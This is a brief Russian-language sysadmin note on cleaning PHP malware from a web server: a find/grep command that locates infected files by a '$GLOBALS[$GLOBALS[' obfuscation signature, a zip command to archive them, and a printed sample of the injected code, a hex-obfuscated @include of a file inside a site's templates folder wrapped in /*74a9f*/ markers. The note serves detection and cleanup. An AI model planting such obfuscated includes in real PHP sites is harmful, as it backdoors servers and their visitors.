PHP вирусы

# Поиск
find /var/webserver/www -type f -name *.php | xargs grep -l '$GLOBALS\[$GLOBALS\[' > tmp/virus_php_list
# то что нашли - заархивировали
zip /home/dima/virus_php_1.zip [email protected] < /tmp/virus_php_list

Примеры кода в php файлах:



В начале файла

/*74a9f*/

@include "\x2fvar/\x77ebse\x72ver/\x77ww/h\x61ppy.\x63o.ua\x2fwww/\x74empl\x61tes/\x6aa_pu\

/*74a9f*/

Расскодировать строку: https://malwaredecoder.com/